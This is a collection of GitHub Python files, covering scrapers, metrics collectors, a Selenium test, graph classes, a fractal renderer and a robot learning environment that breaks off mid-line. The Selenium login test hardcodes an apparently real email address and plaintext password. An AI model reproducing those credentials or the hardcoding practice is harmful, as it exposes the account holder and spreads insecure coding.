%d. The exact difference in ' % (\n testcase_path, index\n )\n )\n helpers.check_difference(\n result, testcase['expected'], testcase_description\n )\n\n _check_testcase_fullness(import_rule, testcase_path, testcases)\n\n\ndef _check_testcase_fullness(import_rule, testcase_path, testcases):\n columns = []\n for column_mapper in (import_rule.mapper_builder.column_mappers or []):\n if not column_mapper.current_date:\n columns.append(column_mapper.output_column)\n\n for attr_mapper in (import_rule.mapper_builder.attribute_mappers or []):\n columns.append(attr_mapper.output_column)\n\n unmapped_columns = set(columns)\n for index, testcase in enumerate(testcases):\n flatten_all_levels_expected = (\n flatten_dict_all_levels(testcase['expected'])\n )\n for field, value in flatten_all_levels_expected.iteritems():\n if value is not None and field in unmapped_columns:\n unmapped_columns.remove(field)\n assert not unmapped_columns, (\n '%s: please, add not only \"value -> None\" mapper '\n 'tests for %s output columns' % (testcase_path, unmapped_columns)\n )\n\n\ndef _byteify(data):\n if isinstance(data, unicode):\n return data.encode('utf-8')\n if isinstance(data, list):\n return [_byteify(item) for item in data]\n if isinstance(data, dict):\n return {\n _byteify(key): _byteify(value)\n for key, value in data.iteritems()\n }\n return data\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests-pytest/test_internal_yt_import_mappers.py","file_name":"test_internal_yt_import_mappers.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3293713070","text":"def compare(a,b):\n if(a>b):\n print('第一个数大\\n')\n return \n if(a 20:\n numero_usuario = int(input('Digite um número > '))\n if 0 <= numero_usuario <= 20:\n print(f\"Você digitou o número 
{numeros_extenso[numero_usuario]}\")\n while continuar not in \"SsNn\":\n continuar = str(input('Você deseja continuar?[S/N] > ')).strip().upper()[0]\n if continuar in \"Nn\":\n break\n else:\n print(\"Opção inválida! Digite um número de 0 a 20. \")\n numero_usuario = 21\n continuar = \" \"\nprint('CALCULADORA FINALIZADA. ATÉ LOGO!')\n","repo_name":"silviorodrigues98/beginner_python_-_js_COURSES","sub_path":"CURSO EM VÍDEO/Python Intermediário/C.E.V. Mundo 3/EX72/TENTATIVA 1.py","file_name":"TENTATIVA 1.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19933022733","text":"#import grequests\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport numpy as np\r\nimport threading\r\nfrom queue import Queue\r\nimport time\r\n\r\nSEARCH_QUERY = \"healthy living\"\r\ndata = pd.read_csv('D:\\Scrapping programs\\healthy+living_urls.csv')\r\ndata = np.array(data)\r\n\r\nurls = data[:,1]\r\n\r\ndataset=[]\r\nlock = threading.Lock()\r\nq = Queue()\r\n\r\ndef myJob(url):\r\n\t\t\r\n\tdatapoint_dict = {}\r\n\tsingle_soup = BeautifulSoup(requests.get(url, timeout=5).content,'html.parser')\r\n\t#print(\"Object created\")\r\n\t# NO_OF_COMMENTS = single_soup.find(id=\"watch-discussion\")\r\n\t# print(NO_OF_COMMENTS)\r\n\tYOUTUBE_CATEGORY = single_soup.find(class_=\"content watch-info-tag-list\").findChildren(\"a\")[0].text\r\n\tchannel_tag = single_soup.find(class_=\"yt-user-info\").findChildren(\"a\")[0]\r\n\tPUBLISH_DATE = single_soup.find(class_=\"watch-time-text\").text\r\n\tDESCRIPTION = single_soup.find(id=\"eow-description\").text\r\n\tVIDEO_TITLE = single_soup.find(\"span\", class_=\"watch-title\").text.strip()\r\n\tVIDEO_VIEWS = single_soup.find(\"div\", class_=\"watch-view-count\").text\r\n\ttry:\r\n\t\tLIKES = single_soup.find('button', {\"title\": \"I like this\"}).findChildren(\"span\")[0].text\r\n\texcept:\r\n\t\tLIKES = \"0\"\r\n\ttry:\t\r\n\t\tDISLIKES = single_soup.find('button', {\"title\": \"I dislike this\"}).findChildren(\"span\")[0].text\r\n\texcept:\r\n\t\tDISLIKES = \"0\"\r\n\tCHANNEL_NAME = channel_tag.text.strip()\r\n\tdatapoint_dict['channel_name'] = CHANNEL_NAME\r\n\t#datapoint_dict['total_subscribers'] = SUBCRIBER_COUNT\r\n\tdatapoint_dict['video_url'] = url\r\n\tdatapoint_dict['video_title'] = VIDEO_TITLE\r\n\tdatapoint_dict['video_views'] = VIDEO_VIEWS\r\n\tdatapoint_dict['likes'] = LIKES\r\n\tdatapoint_dict['dislikes'] = DISLIKES\r\n\tdatapoint_dict['description'] = DESCRIPTION\r\n\tdatapoint_dict['published_date'] = PUBLISH_DATE\r\n\tdatapoint_dict['youtube_category'] = YOUTUBE_CATEGORY\r\n\twith lock:\r\n\t\tdataset.append(datapoint_dict)\r\n\t\tprint(f\"Video URL :- {url}\")\r\n\t\tprint(f\"Channel name: {CHANNEL_NAME}\")\r\n\t\t#print(f\"Subscriber count: {SUBCRIBER_COUNT}\")\r\n\t\tprint(f\"Video Title: {VIDEO_TITLE}\")\r\n\t\tprint(f\"No of views= {VIDEO_VIEWS}\")\r\n\t\tprint(f\"Likes: {LIKES}\")\r\n\t\tprint(f\"Dislikes: {DISLIKES}\")\r\n\t\tprint(f\"Description: {DESCRIPTION}\")\r\n\t\tprint(f\"Published on: {PUBLISH_DATE}\")\r\n\t\tprint(f\"Youtube category: {YOUTUBE_CATEGORY}\")\r\n\t\tprint(len(dataset))\r\n\t\tprint(\"--------------------------------------------------------\")\r\n\r\n\t\t\r\ndef threader():\r\n\twhile True:\r\n\t\turl = q.get()\r\n\t\tmyJob(url)\r\n\t\tq.task_done()\r\n\r\nfor x in range(10): \r\n\tt = threading.Thread(target = threader)\r\n\tt.daemon = True\r\n\tt.start()\r\n\r\nfor url in 
urls:\r\n\tq.put(url)\r\n\r\nq.join()\r\nprint(len(dataset))\r\ndata = pd.DataFrame(dataset)\r\ndata.to_csv(f'{SEARCH_QUERY}_dataset.csv')","repo_name":"Anko1418/Youtube_Scraping_by_keywords_in_python","sub_path":"WebScrapper.py","file_name":"WebScrapper.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42333430212","text":"# 用于从Prometheus中获取函数的调用日志\n'''\n获取所有metrics的名称: curl http://127.0.0.1:9090/api/v1/label/__name__/values\n\n'''\nimport csv\n\nimport requests\nfrom urllib.parse import urljoin\nimport json\n\n\nclass Prometheus_collector:\n def __init__(self, prometheus_ip=\"127.0.0.1\", port=9090) -> None:\n self.base_url = f\"http://{prometheus_ip}:{port}\"\n pass\n\n # 获取Prometheus的所有metrics name\n def get_all_metric_name_list(self):\n req_url = urljoin(self.base_url, \"api/v1/label/__name__/values\")\n response = requests.get(\n url=req_url\n )\n res_dict = json.loads(response.content)\n if res_dict[\"status\"] == \"success\":\n return res_dict[\"data\"]\n else:\n return []\n\n # 获取指定metric name的历史数据\n def get_by_metric_name(self, metric_name):\n pass\n\n\n# 从自己做的function runtime中获取metrics\nclass Runtime_collector:\n def __init__(self) -> None:\n pass\n\n def load_data_dict_list(self, csv_path=None):\n # 从csv文件中加载result_dict_list\n # 读取csv文件\n data_dict_list = []\n with open(csv_path, 'r', newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n input_obj = row.get(\"input_obj\")\n log_dict = row.get(\"log_dict\")\n result_dict = row.get(\"result_dict\")\n resource_dict = row.get(\"resource_dict\")\n\n # json不规范需要replace修正\n input_obj = json.loads(input_obj.replace(\"'\", '\"').replace(\"True\", \"true\").replace(\"False\", \"false\"))\n log_dict = json.loads(log_dict.replace(\"'\", '\"').replace(\"True\", \"true\").replace(\"False\", \"false\"))\n result_dict = json.loads(\n result_dict.replace(\"'\", '\"').replace(\"True\", \"true\").replace(\"False\", \"false\"))\n resource_dict = json.loads(\n resource_dict.replace(\"'\", '\"').replace(\"True\", \"true\").replace(\"False\", \"false\"))\n\n res_dict = {\n \"input_obj\": input_obj,\n \"log_dict\": log_dict,\n \"result_dict\": result_dict,\n \"resource_dict\": resource_dict\n }\n data_dict_list.append(res_dict)\n return data_dict_list\n\n def data_dict_list_filter(self, node_name_list=None, cpu_list=None, cold_start=None, data_dict_list=None) -> list:\n # 对data_dict_list进行过滤\n filtered_data_dict_list = []\n for data_dict in data_dict_list:\n input_obj = data_dict.get(\"input_obj\")\n log_dict = data_dict.get(\"log_dict\")\n result_dict = data_dict.get(\"result_dict\")\n resource_dict = data_dict.get(\"resource_dict\")\n # 分别针对指标进行筛选\n if node_name_list is not None:\n node_name = resource_dict.get(\"node_name\")\n if node_name not in node_name_list:\n continue\n if cpu_list is not None:\n cpu = resource_dict.get(\"cpu\")\n if cpu not in cpu_list:\n continue\n if cold_start is not None:\n cold_start_flag = log_dict.get(\"COLD_START_FLAG\")\n if cold_start_flag != cold_start:\n continue\n filtered_data_dict_list.append(data_dict)\n return filtered_data_dict_list\n\n def get_mapping_delay_time_series(self, data_dict_list):\n # 从result_dict_list中获取mapping_delay的时间序列\n mapping_delay_tuple_list = []\n\n for data_dict in data_dict_list:\n input_obj = data_dict.get(\"input_obj\")\n log_dict = data_dict.get(\"log_dict\")\n result_dict = data_dict.get(\"result_dict\")\n\n mapping_delay = 
log_dict.get(\"mapping_delay\")\n invoke_t = input_obj.get(\"invoke_t\")\n mapping_delay_tuple_list.append((invoke_t, mapping_delay)) # 用元组的第一个元素作为排序的依据\n\n # print(f\"input_obj:{input_obj}\")\n # print(f\"log_dict:{log_dict}\")\n # print(f\"result_dict:{result_dict}\")\n\n # 对mapping_delay_tuple_list进行排序\n # print(f\"mapping_delay_tuple_list:{mapping_delay_tuple_list}\")\n mapping_delay_tuple_list.sort(key=lambda x: x[0]) # 用元组的第一个元素作为排序的依据\n # 用列表中的第二个元素生成新的列表\n mapping_delay_list = [x[1] for x in mapping_delay_tuple_list]\n return mapping_delay_list\n\n def get_request_count_time_series(self, data_dict_list):\n # 从result_dict_list中获取函数请求量的时间序列\n\n pass\n\n def get_latency_time_series(self, data_dict_list):\n # 从result_dict_list中获取函数延迟的时间序列\n latency_time_list = []\n latency_time_tuple_list = []\n\n for data_dict in data_dict_list:\n input_obj = data_dict.get(\"input_obj\")\n log_dict = data_dict.get(\"log_dict\")\n result_dict = data_dict.get(\"result_dict\")\n\n finish_t = log_dict.get(\"finish_t\")\n invoke_t = input_obj.get(\"invoke_t\")\n latency_t = finish_t - invoke_t\n latency_time_tuple_list.append((invoke_t, latency_t)) # 用元组的第一个元素作为排序的依据\n\n # print(f\"input_obj:{input_obj}\")\n # print(f\"log_dict:{log_dict}\")\n # print(f\"result_dict:{result_dict}\")\n\n # 对mapping_delay_tuple_list进行排序\n # print(f\"mapping_delay_tuple_list:{mapping_delay_tuple_list}\")\n latency_time_tuple_list.sort(key=lambda x: x[0]) # 用元组的第一个元素作为排序的依据\n # 用列表中的第二个元素生成新的列表\n latency_time_list = [x[1] for x in latency_time_tuple_list]\n return latency_time_list\n\n def get_compute_time_series(self, data_dict_list):\n # 从data_dict_list中获取函数计算时间的时间序列\n compute_time_list = []\n compute_time_tuple_list = []\n\n for data_dict in data_dict_list:\n input_obj = data_dict.get(\"input_obj\")\n log_dict = data_dict.get(\"log_dict\")\n result_dict = data_dict.get(\"result_dict\")\n\n invoke_t = input_obj.get(\"invoke_t\")\n compute_t = log_dict.get(\"compute_t\")\n\n compute_time_tuple_list.append((invoke_t, compute_t)) # 用元组的第一个元素作为排序的依据\n\n # print(f\"input_obj:{input_obj}\")\n # print(f\"log_dict:{log_dict}\")\n # print(f\"result_dict:{result_dict}\")\n\n # 对mapping_delay_tuple_list进行排序\n # print(f\"mapping_delay_tuple_list:{mapping_delay_tuple_list}\")\n compute_time_tuple_list.sort(key=lambda x: x[0]) # 用元组的第一个元素作为排序的依据\n # 用列表中的第二个元素生成新的列表\n compute_time_list = [x[1] for x in compute_time_tuple_list]\n return compute_time_list\n\n def get_cold_start_time_series(self, data_dict_list):\n # 从data_dict_list中获取函数冷启动的时间序列\n pass\n\n def get_scheduled_location_list(self, data_dict_list):\n # 从data_dict_list中获取函数被调度的位置的列表\n # 位置用 pod_name 和 node_name来描述\n scheduled_location_list = []\n scheduled_location_tuple_list = []\n\n for data_dict in data_dict_list:\n input_obj = data_dict.get(\"input_obj\")\n log_dict = data_dict.get(\"log_dict\")\n result_dict = data_dict.get(\"result_dict\")\n resource_dict = data_dict.get(\"resource_dict\")\n\n invoke_t = input_obj.get(\"invoke_t\")\n\n pod_name = resource_dict.get(\"hostname\")\n node_name = resource_dict.get(\"nodename\")\n\n location = {\n \"pod_name\": pod_name,\n \"node_name\": node_name,\n }\n\n scheduled_location_tuple_list.append((invoke_t, location)) # 用元组的第一个元素作为排序的依据\n\n # print(f\"input_obj:{input_obj}\")\n # print(f\"log_dict:{log_dict}\")\n # print(f\"result_dict:{result_dict}\")\n\n # 进行排序\n scheduled_location_tuple_list.sort(key=lambda x: x[0]) # 用元组的第一个元素作为排序的依据\n # 用列表中的第二个元素生成新的列表\n scheduled_location_list = [x[1] for x in scheduled_location_tuple_list]\n 
return scheduled_location_list\n pass\n\n\nclass Test_Runtime_collector:\n def __init__(self):\n pass\n\n def test_load_result_dict_list(self):\n my_runtime_collector = Runtime_collector()\n res = my_runtime_collector.load_data_dict_list(csv_path=\"logs/example.csv\")\n print(f\"load_result_dict_list:{res}\")\n\n def test_get_concurrency_time_series(self):\n my_runtime_collector = Runtime_collector()\n data_dict_list = my_runtime_collector.load_data_dict_list(csv_path=\"logs/example.csv\")\n res = my_runtime_collector.get_mapping_delay_time_series(data_dict_list=data_dict_list[0:20])\n print(f\"get_mapping_delay_time_series:{res}\")\n\n def test_get_latency_time_series(self):\n my_runtime_collector = Runtime_collector()\n data_dict_list = my_runtime_collector.load_data_dict_list(csv_path=\"logs/example.csv\")\n res = my_runtime_collector.get_latency_time_series(data_dict_list=data_dict_list[0:20])\n print(f\"get_latency_time_series:{res}\")\n\n def test_get_compute_time_series(self):\n my_runtime_collector = Runtime_collector()\n data_dict_list = my_runtime_collector.load_data_dict_list(csv_path=\"logs/example.csv\")\n res = my_runtime_collector.get_compute_time_series(data_dict_list=data_dict_list[0:20])\n print(f\"get_compute_time_series:{res}\")\n\n def test_get_scheduled_location_list(self):\n my_runtime_collector = Runtime_collector()\n data_dict_list = my_runtime_collector.load_data_dict_list(csv_path=\"logs/example.csv\")\n res = my_runtime_collector.get_scheduled_location_list(data_dict_list=data_dict_list[0:20])\n print(f\"get_scheduled_location_list:{res}\")\n\n def test_data_dict_list_filter(self):\n my_runtime_collector = Runtime_collector()\n data_dict_list = my_runtime_collector.load_data_dict_list(csv_path=\"logs/example.csv\")\n res = my_runtime_collector.data_dict_list_filter(\n node_name_list=[\"k8s01\",\"k8s02\",\"k8s03\",\"k8s04\",\"k8s05\",\"k8s06\",\"k8s07\",\"k8s08\"],\n cpu_list=[2],\n cold_start=True,\n data_dict_list=data_dict_list\n )\n print(f\"data_dict_list_filter:{res}\")\n\n\n\nif __name__ == \"__main__\":\n my_test = Test_Runtime_collector()\n my_test.test_load_result_dict_list()\n\n # my_test.test_get_concurrency_time_series()\n # my_test.test_get_latency_time_series()\n # my_test.test_get_compute_time_series()\n my_test.test_data_dict_list_filter()\n # my_test.test_get_scheduled_location_list()\n","repo_name":"wenzhaojie/faas-invoker","sub_path":"faas_invoker/metrics_collector.py","file_name":"metrics_collector.py","file_ext":"py","file_size_in_byte":11119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"24197673340","text":"from os import path, listdir, rename, remove, chdir\nfrom shutil import rmtree\nimport subprocess\nfrom sys import stderr\n\n\ndef run_cmd(cmd):\n print(cmd)\n complete_process = subprocess.run(cmd.split(' '))\n if complete_process.returncode != 0:\n print(\"Error: sbatch command finished on non 0 return value\", file=stderr)\n print(\"error code\", complete_process.returncode, file=stderr)\n return False\n return True\n\n\nsample_path = path.join(\"data\", \"CFDL_split\", \"res_10129\")\nmols_path = path.join(sample_path, \"molecules_10129\")\n\nfiles_per_mol = {}\n\n# Register all missing files per molecule\nfor file in listdir(mols_path):\n if file.endswith(\".fa\"):\n mol = file[:file.find(\"_\")]\n if mol not in files_per_mol:\n files_per_mol[mol] = []\n files_per_mol[mol].append(file)\n\n# Move to the mol directory to decompress/recompress\nchdir(mols_path)\nfor mol 
in files_per_mol:\n # decompress the molecule\n mol_dir = f\"10129_{mol}\"\n archive = f\"10129_{mol}.tar.gz\"\n ok = run_cmd(f\"tar -xzf {archive}\")\n if ok:\n remove(archive)\n else:\n print(\"Problem on molecule\", mol, file=stderr)\n exit(1)\n\n # add the files\n for file in files_per_mol[mol]:\n rename(file, path.join(mol_dir, file[file.rfind('/')+1:]))\n\n # recompress the molecule\n ok = run_cmd(f\"tar -czf {archive} {mol_dir}\")\n if ok:\n rmtree(mol_dir)\n else:\n print(\"Recompression failed for\", mol_dir)\n exit(1)\n","repo_name":"yoann-dufresne/jeanzay_colabfold","sub_path":"scripts/debug/rezip.py","file_name":"rezip.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41278939451","text":"import unittest\nfrom selenium import webdriver\nfrom pages.login.LoginPage import LoginPage\nfrom pages.dashboard.DashboardPage import DashboardPage\nfrom pages.usecases.UseCasesPage import UseCasesPage\nfrom pages.usecase.UseCasePage import UseCasePage\nfrom tests.tests_data.UseCaseMockData import UseCaseDataMock\nfrom selenium.webdriver.support import expected_conditions as ExpectedConditions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\n\n\nclass CreateUseCasesTest(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Firefox()\n self.driver.get(\"https://qa-sandbox.apps.htec.rs/dashboard\")\n loginFromContainer = self.driver.find_element_by_class_name('btn-secondary')\n loginFromContainer.click()\n WebDriverWait(self.driver, 10).until(\n ExpectedConditions.visibility_of_element_located((By.CSS_SELECTOR, \"button[data-testid='submit_btn']\"))\n )\n loginPage = LoginPage(self.driver)\n loginPage.enter_login_credentials(\"stancicmilan06@gmail.com\", \"lINKINpARK06\")\n loginPage.submitButton.click()\n\n def testCreateUseCases(self):\n WebDriverWait(self.driver, 10).until(\n ExpectedConditions.visibility_of_element_located((By.CSS_SELECTOR, \"div[data-testid='use_cases_card_id']\"))\n )\n dashboard_page = DashboardPage(self.driver)\n dashboard_page.use_cases_card.click()\n\n mock_data = UseCaseDataMock()\n\n for test_case_index in range(len(mock_data.all_use_cases)):\n #ovo ili je nepotrebno ili trerba izmeniti da gadja stranicu\n WebDriverWait(self.driver, 10).until(\n ExpectedConditions.visibility_of_element_located(\n (By.CSS_SELECTOR, \"a[data-testid='create_use_case_btn']\"))\n )\n use_cases_page = UseCasesPage(self.driver)\n use_cases_page.create_use_case_btn.click()\n\n data = mock_data.all_use_cases[test_case_index]\n\n self.create_new_use_case(data)\n\n use_cases_page = UseCasesPage(self.driver)\n saved_use_case = use_cases_page.get_first_use_case()\n\n self.assertEqual(data.title, saved_use_case.get_title())\n self.assertEqual(data.description, saved_use_case.get_description())\n self.assertEqual(data.expected_result, saved_use_case.get_expected_result())\n self.assertEqual(len(data.steps), saved_use_case.get_num_of_steps())\n\n for step_index in range(len(data.steps)):\n self.assertEqual(data.steps[step_index], saved_use_case.get_step_value(step_index))\n\n saved_use_case.return_to_dashboard_btn.click()\n\n def create_new_use_case(self, mock_data):\n\n new_use_case = UseCasePage(self.driver)\n new_use_case.set_title(mock_data.title)\n new_use_case.set_description(mock_data.description)\n new_use_case.set_expected_result(mock_data.expected_result)\n new_use_case.set_steps(mock_data.steps)\n 
new_use_case.submit_btn.click()\n\n def tearDown(self):\n # close the browser window\n self.driver.quit()","repo_name":"Zovido/webdriver-test","sub_path":"tests/test_cases/CreateUseCasesTest.py","file_name":"CreateUseCasesTest.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4416365672","text":"# coding: utf-8\n\"\"\"\nGraph\nhttps://en.wikipedia.org/wiki/Graph_(abstract_data_type)\nhttps://en.wikipedia.org/wiki/Adjacency_list\n\"\"\"\nfrom collections import defaultdict\n\nfrom data_structures.graphs.adjacency_map_directed_weighted_graph import DirectedGraph\n\n\nclass UndirectedGraph(DirectedGraph):\n def __init__(self):\n super().__init__()\n\n # {\n # 'source_vertex': {\n # 'destination_vertex': 'edge_weight',\n # },\n # 'destination_vertex': {\n # 'source_vertex': 'edge_weight',\n # }\n # }\n # NOTE: outgoing_edges of an undirected graph contains both (u, v) and (v, u) for each edge.\n self.outgoing_edges = defaultdict(dict)\n\n def add_edge(self, u, v, weight=None):\n # Actually, we can treat a directed graph as a undirected graph.\n # As long as we add both endpoints for the same edge, for instance, `add_edge(u, v, 1)` and `add_edge(v, u, 1)`.\n self.outgoing_edges[u][v] = weight\n self.outgoing_edges[v][u] = weight\n\n def remove_edge(self, u, v):\n try:\n del self.outgoing_edges[u][v]\n del self.outgoing_edges[v][u]\n except KeyError:\n raise ValueError(f'No such edge: {(u, v)} or {(v, u)}')\n\n def edge_count(self):\n count = 0\n for _ in self.edges():\n count += 1\n return count\n\n def edges(self):\n deduplicate_edges = set()\n for source, incident_edges in self.outgoing_edges.items():\n for destination, weight in incident_edges.items():\n # Make sure that (u, v) and (v, u) wouldn't both exist in the results.\n pair = sorted([source, destination])\n deduplicate_edges.add((pair[0], pair[1], weight))\n\n return deduplicate_edges\n\n def incident_edges(self, v, edge_type='outgoing'):\n for destination, weight in self.outgoing_edges[v].items():\n pair = sorted([v, destination])\n yield (pair[0], pair[1], weight)\n","repo_name":"vinta/fuck-coding-interviews","sub_path":"data_structures/graphs/adjacency_map_undirected_weighted_graph.py","file_name":"adjacency_map_undirected_weighted_graph.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":652,"dataset":"github-code","pt":"66"} +{"seq_id":"72967378131","text":"import Mandelbrot\nfrom RGB import RGB\nfrom ZoomList import ZoomList\nfrom Zoom import Zoom\nfrom Mandelbrot import Mandelbrot\n\n\nclass FractalCreator(object):\n\n def __init__(self, width, height, num_of_iterations):\n self.width = width\n self.height = height\n self.fractal = [[0 for y in range(self.height)] for x in range(self.width)]\n self.histogram = [0] * num_of_iterations\n self.ranges = []\n self.range_totals = []\n self.colors = []\n self.zoomlist = ZoomList(width=width, height=height)\n self.got_starting_range = False\n self.max_iterations = num_of_iterations\n self.mandelbrot = Mandelbrot(num_of_iterations)\n\n def run(self):\n self.calculate_iterations()\n self.calculate_ranges()\n self.draw_fractal()\n\n def add_zoom(self, x, y, scale):\n self.zoomlist.add(Zoom(x, self.height - y, scale))\n\n def add_scroll(self, x, y):\n self.zoomlist.scroll(x, y)\n\n def add_range(self, range_end, r, g, b):\n self.ranges.append(range_end * self.max_iterations)\n self.colors.append(RGB(r, g, b))\n\n if 
self.got_starting_range:\n self.range_totals.append(0)\n else:\n self.got_starting_range = True\n\n def get_range(self, iteration):\n range_i = 0\n\n for i in range(1, len(self.ranges)):\n range_i = 1\n if self.ranges[i] > iteration:\n break\n\n range_i = range_i - 1\n return range_i\n\n def calculate_iterations(self):\n print(\"Calculating iterations\")\n # Calculating the iterations\n for y in range(self.height):\n for x in range(self.width):\n\n coords = self.zoomlist.do_zoom(x=x, y=y)\n iterations = self.mandelbrot.getIterations(coords[0], coords[1])\n\n self.fractal[x][y] = iterations\n\n if iterations != self.max_iterations:\n self.histogram[iterations] += 1\n\n def calculate_ranges(self):\n print(\"Calculating ranges\")\n # Calculating the ranges\n rangeindex = 0\n for i in range(self.max_iterations):\n pixels = self.histogram[i]\n\n if i >= self.ranges[rangeindex + 1]:\n rangeindex += 1\n\n self.range_totals[rangeindex] += + pixels\n\n def draw_fractal(self):\n print(\"Drawing fractal\")\n # Create the file writer\n filename = \"example.ppm\"\n with open(filename, \"w\") as output_file:\n print(\"P3\", file=output_file)\n print(str(self.width) + \" \" + str(self.height), file=output_file)\n print(255, file=output_file)\n\n # Draw the fractal\n total = 0\n for i in range(self.max_iterations):\n total = total + self.histogram[i]\n\n for y in range(self.height):\n for x in range(self.width):\n iteration = self.fractal[x][y]\n iteration_range = self.get_range(iteration)\n range_total = self.range_totals[iteration_range]\n range_start = self.ranges[iteration_range]\n\n start_color = self.colors[iteration_range]\n end_color = self.colors[iteration_range + 1]\n diff_color = end_color - start_color\n red = 0\n green = 0\n blue = 0\n\n if iteration != self.max_iterations:\n\n total_pixels = 0\n for i in range(range_start, iteration):\n total_pixels += self.histogram[i]\n\n red = int(start_color.r + pow(diff_color.r, total_pixels/range_total))\n blue = int(start_color.b + pow(diff_color.b, total_pixels/range_total))\n green = int(start_color.g + pow(diff_color.g, total_pixels/range_total))\n\n print(\"Writing pixel \" + str(x) + \", \" + str(y))\n # Write to file here\n print(str(red) + \" \" + str(green) + \" \" + str(blue) + \" \", file=output_file)\n","repo_name":"ksfoster66/FractalDisplay","sub_path":"FractalCreator.py","file_name":"FractalCreator.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40034981087","text":"\"\"\"\nyaooooo\nthis is robot env code\nupdate time:12/11\n\n將距離和角度正規化並修改reward和結束條件\n\nstate dim=5\n0~3:joint pos\n# 4~6:cuboid pos\n# 7~9:EEF pos\n4:dis\n-------------------\naction dim=4\njoint pos\n--------------------\njoint_bound\njoint 1=[-170 170]\njoint 2=[-135 80]\njoint 3=[-70 104]\njoint 4=[-190 190]\njoint 5=[-115 115]\njoint 6=[-360 360]\n\n\"\"\"\n\nimport numpy as np\nimport math\nimport time\nimport inverseKinematics as IK\nimport Kinematics as FK\nfrom IK_FindOptSol import FindOptSol\nfrom simulation_robot import simulation_robot as id_robot\nfrom robot_vrep import my_robot\n\nradtodeg = 180 / math.pi # 弧度轉角度\ndegtorad = math.pi / 180 # 角度轉弧度\n#這裡單位是 cm 吸嘴加0.068m\nDH_table = np.array([[0, 0.345, 0.08, math.pi / 2],\n\t\t\t\t\t [0+math.pi / 2 , 0, 0.27, 0],\n\t\t\t\t\t [0, 0, 0.09, math.pi / 2],\n\t\t\t\t\t [0, 0.295, 0, -math.pi / 2],\n\t\t\t\t\t [0, 0, 0, math.pi / 2],\n\t\t\t\t\t [0, 0.102+0.068, 0, 0]])\n\n\ndef save_txt(data, fmt='%f'):\n f = 
open('C:/Users/user/Desktop/rl/data.txt', 'a')\n np.savetxt(f, data, fmt=fmt)\n f.close()\n\nclass robot_env(object):\n # joint_bound\n degtorad = math.pi / 180\n joint1_bound = [-50 * degtorad, 50 * degtorad]#(-0.87~0.87)\n joint2_bound = [-80 * degtorad, 70 * degtorad]#(-1.430~1.22)\n joint3_bound = [-60 * degtorad, 60 * degtorad]#(-1.22~1.04)\n joint4_bound = [0 * degtorad, 0 * degtorad]\n joint5_bound = [-90 * degtorad, 3 * degtorad]#(-1.57~0)\n joint6_bound = [-360 * degtorad, 360 * degtorad]\n state_dim = 7\n action_dim = 3\n\n def __init__(self):\n self.radtodeg = 180 / math.pi # 弧度轉角度\n self.degtorad = math.pi / 180 # 角度轉弧度\n self.my_robot = my_robot()\n self.my_robot.connection()\n\n def initial(self):\n self.my_robot.stop_sim()\n self.my_robot.start_sim()\n\n def reset(self):\n # return state containing joint ,EFF ,target ,dis\n # robot to initial pos and random the target\n\n #self.my_robot.stop_sim()\n #self.my_robot.start_sim()\n self.my_robot.move_all_joint([0,0,0,0,0,0])\n print('reset')\n\n #self.my_robot.start_sim()\n self.my_robot.random_object()\n return self.get_state()\n\n def get_state(self):\n # state:{物體位置,末端點位置}\n # self.joint_pos = self.my_robot.get_joint_pos() # dim=6\n # self.joint_pos=np.round(self.joint_pos,5)\n # Info, EulerAngle_vrep, self.EulerAngle, Position = FK.ForwardKinemetics(self.joint_pos , DH_table)\n # Position=np.round(Position,4)\n EEF_pos = self.my_robot.get_EEF_pos() # dim=3\n EEF_pos = np.round(EEF_pos , 4)\n\n cubid_pos = self.my_robot.get_cuboid_pos() # dim=3\n\n\n diffence = [(cubid_pos[0] - EEF_pos[0]), (cubid_pos[1] - EEF_pos[1]), (cubid_pos[2] - EEF_pos[2])]\n self.distance = np.sqrt(pow(diffence[0], 2) + pow(diffence[1], 2) + pow(diffence[2], 2))\n\n s = np.hstack((EEF_pos, cubid_pos, self.distance ))\n # print('s',s)\n # 吸嘴狀態還沒加上去\n return s\n\n\n def step(self, action):\n done = False\n outbound=False\n reward = 0\n optimalsol_set=[]\n # print('action',action)\n # EEF_pos = self.my_robot.get_EEF_pos() # dim=3\n joint_pos = self.my_robot.get_joint_pos() # dim=6\n\n time.sleep(0.2)\n joint_pos[0] = joint_pos[0] + action[0]\n joint_pos[1] = joint_pos[1] + action[1]\n joint_pos[2] = joint_pos[2] + action[2]\n\n\n outbound = self.check_bound(joint_pos,outbound)\n\n\n if not outbound:\n self.my_robot.move_all_joint(joint_pos)\n else:\n\n reward-=1\n\n # suction_flag=False#是否吸取物體\n EEF_pos = self.my_robot.get_EEF_pos() # dim=3\n cubid_pos = self.my_robot.get_cuboid_pos()\n diffence = [(cubid_pos[0] - EEF_pos[0]), (cubid_pos[1] - EEF_pos[1]), (cubid_pos[2] - EEF_pos[2])]\n distance = np.sqrt(pow(diffence[0], 2) + pow(diffence[1], 2) + pow(diffence[2], 2))\n # print('dis',distance)\n\n # joint_pos = self.my_robot.get_joint_pos()\n # # print('joint_pos',joint_pos)\n # joint_state = np.hstack((joint_pos[0], joint_pos[1], joint_pos[2], joint_pos[4])) # dim4\n\n # if self.distance0.1:\n reward += 